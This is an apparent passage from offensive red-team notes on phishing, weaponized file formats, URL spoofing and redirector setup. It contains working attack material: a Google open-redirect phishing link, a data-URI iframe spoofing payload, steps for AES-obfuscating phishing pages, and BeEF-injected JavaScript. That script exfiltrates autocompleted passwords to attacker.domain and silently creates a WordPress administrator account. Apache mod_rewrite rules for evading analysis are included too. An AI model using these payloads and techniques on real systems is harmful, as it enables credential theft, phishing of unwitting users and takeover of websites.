  <a href="ms-word:nft|u|<malicous_domain/malicious.docm">Click</a>
</html>
```

---

### Uncommon extensions

- CHM - Custom JS backdoor
- HTA - Custom JS backdoor
- LNK
- IQY - credential and NTLM hash harvesting
- MSG - Evade email defense
- RTF - auto-dropping

#### Microsoft Complied HTML Help file (CHM)

Online help format - a collection of HTML pages, an index and other navigation tools.

- Compressed, binary format
- CHM files downloaded from email → Users need to click `unblock` to run
- CHM downloaded programmatically → do not need to unblock

[https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/](https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/)

Weaponize a CHM file with a custom JS backdoor - insert the following HTML inside the CHM:

- [https://gist.github.com/anonymous/15e99d0fd883692bd2e300634ed3c09b](https://gist.github.com/anonymous/15e99d0fd883692bd2e300634ed3c09b)

---

## Phishing Techniques

### CSRF / Open redirects

[https://www.seancassidy.me/lostpass.html](https://www.seancassidy.me/lostpass.html)

- Commonly seen at the logout function

Locate open redirect on a widely used website to misuse.

[https://vagmour.eu/google-open-url-redirection/](https://vagmour.eu/google-open-url-redirection/)

- Createa an `_ah` directory on oru domain and inside it another directory called `conflogin`
- Place the phishing page inside the `conflogin` directory in `index.html` or `index.php` file
- Send the phishing link:
https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fappengine.google.com%2F_ah%2Fconflogin%3Fcontinue%3Dhttps%3A%2F%2Fattacker.domain%2F&service=ah

- Prompt for users Google credentials with legit Google page
- When submitting, the user will be redirected to the phishing page.

### Trustworthy looking redirect form

- JS code with MitM capabilities - when inserted into an HTML form, can convince an individual that his request will actually go to the correct or to a trusted location.
- The JS will display the correct location - but when hovering over the link / submit button, it also send the supplied information to the attacker.

Example:

1. Run as soon as a bank page html form is loaded
2. Intercept all requests made to the bank page
3. Route all requests to a remote server under control, while the browser still tries to communicate with the original bank page

Reference:

- [https://gist.github.com/anonymous/3bf8342c76eba4da3f660cbffa24f5d8](https://gist.github.com/anonymous/3bf8342c76eba4da3f660cbffa24f5d8)
- [https://gist.github.com/anonymous/75b5eb6578bbc5bfcabe44e8fbb952ea](https://gist.github.com/anonymous/75b5eb6578bbc5bfcabe44e8fbb952ea)
- [https://gist.github.com/anonymous/950a70cdebd3e78b6e88312fa7d93250](https://gist.github.com/anonymous/950a70cdebd3e78b6e88312fa7d93250)

### URL Spoofing

1. Data URIs - present media content in a web browser without hosting the actual data on the internet
    1. `data:[<mediatype(MIME)>][;base64],<data>`
    2. Can represent any content type - image/jpeg, text/html, ...
    3. B64 encoding is optional
    4. Usually start with a landing page:
    
    ```vbnet
    <meta http-equiv="Refresh" content="0;
    url=data:text/html,https://accounts.google.com
    <iframe src='attack.com' style=' position:fixed; top:0px; left:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;'> Your browser doesn't support iframes </iframe>">
    ```
    

1. Obfuscation
    1. Automated HTML encrypter:
    [https://www.webtoolhub.com/tn561359-html-encrypter.aspx](https://www.webtoolhub.com/tn561359-html-encrypter.aspx)
    2. Automated JS obfuscator:
    [https://javascriptobfuscator.com/](https://javascriptobfuscator.com/)
    3. Custom JS based AES encryption:
    [https://gist.github.com/ianpurton/1122562](https://gist.github.com/ianpurton/1122562)
    4. Encrypt the source code from the above step:
    [https://gist.github.com/anonymous/315be2adc72603005d7c7b176c163ed7](https://gist.github.com/anonymous/315be2adc72603005d7c7b176c163ed7)
    5. Place the AES encrypted source inside the `to_aes_decrypt` variable of the following HTML file. This will be the source code to be sent to the target:
    [https://gist.github.com/anonymous/e749f1b8fcbdb08b9d709eb1df8b9575](https://gist.github.com/anonymous/e749f1b8fcbdb08b9d709eb1df8b9575)

APT reference:
[https://www.fireeye.com/blog/threat-research/2016/06/rotten_apples_apple.html](https://www.fireeye.com/blog/threat-research/2016/06/rotten_apples_apple.html)

Other URL obfuscating technique:

- [https://web.archive.org/web/20140702141151/http:/morph3us.org/blog/index.php?/archives/35-Dotless-IP-addresses-and-URL-Obfuscation.html](https://web.archive.org/web/20140702141151/http:/morph3us.org/blog/index.php?/archives/35-Dotless-IP-addresses-and-URL-Obfuscation.html)
- [http://www.irongeek.com/i.php?page=security/out-of-character-use-of-punycode-and-homoglyph-attacks-to-obfuscate-urls-for-phishing](http://www.irongeek.com/i.php?page=security/out-of-character-use-of-punycode-and-homoglyph-attacks-to-obfuscate-urls-for-phishing)
- [http://www.pc-help.org/obscure.htm#how](http://www.pc-help.org/obscure.htm#how)
- [https://www.brokenbrowser.com/bypass-the-patch-to-keep-spoofing-the-address-bar-with-the-malware-warning/](https://www.brokenbrowser.com/bypass-the-patch-to-keep-spoofing-the-address-bar-with-the-malware-warning/)
- [https://www.vgrsec.com/post20170219.html](https://www.vgrsec.com/post20170219.html)
- [https://www.xudongz.com/blog/2017/idn-phishing/](https://www.xudongz.com/blog/2017/idn-phishing/)

### BeEF use cases

- 1) XSS + Same Origin + Auto-complete = Admin credential
    - Insecure X-Frame-Options header on the login page (SAMEORIGIN)
    - [https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html](https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html)
- 2) XSS → CSRF bypass → Admin level access
    - JS injection to add new admin
    - Lack anti-CSRF token or nonce for vulnerability

For 1), create an invisible iframe containing the targeted site login page in the vulnerable XSS page. In case of Auto-complete - can capture admin credential by injecting custom JS code.

```vbnet
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://target.domain/wp-login.php";
Dcocument.body.appendChild(iframe);
```

```vbnet
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){location.href='http://attacker.domain/index.php?pass='+s;}else{alert(‘No Autocomplete?')}return true;}}
```

For 2) - XSS + insecure CSRF.  Use BeEF inject raw JS:

```vbnet
var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wp-admin/user-new.php";
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch[1];

var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=attacker@site.com&pass1=attacker&pass2=attacker&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);
```

### DYRE’s spreading method

[http://www.xorrior.com/phishing-on-the-inside/](http://www.xorrior.com/phishing-on-the-inside/)

---

## Anti-Analysis

### Apache mod_rewrite

- [https://httpd.apache.org/docs/current/mod/mod_rewrite.html](https://httpd.apache.org/docs/current/mod/mod_rewrite.html)
- Use an apache box as a redirector.
- <Attacker infra> —> Apache —> Target

1. User Agent Redirection
    1. Mobile users → Mobile phishing page

**[mod_rewrite Cheetsheet](https://cheatography.com/davechild/cheat-sheets/mod-rewrite/)**

Example:

```vbnet
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|googlebot-mobile|ipad|iphone|ipod|mobile|webos|iemobile|palomos" [NC]
RewriteRule ^.* http://.../mobile [P]
RewriteRule ^.* http://...%{REQUEST_URI} [P]
```

Invalid URI redirection

```vbnet
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(profiler|payload)/? [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN\.com [NC]
RewriteRule ^.* http://...%{REQUEST_URI} [P]
RewriteRule ^.* http://REDIRECTION-URL.com/? [L,R=302]
```

**[OS-based redirection](http://www.javascripter.net/faq/operatin.htm)**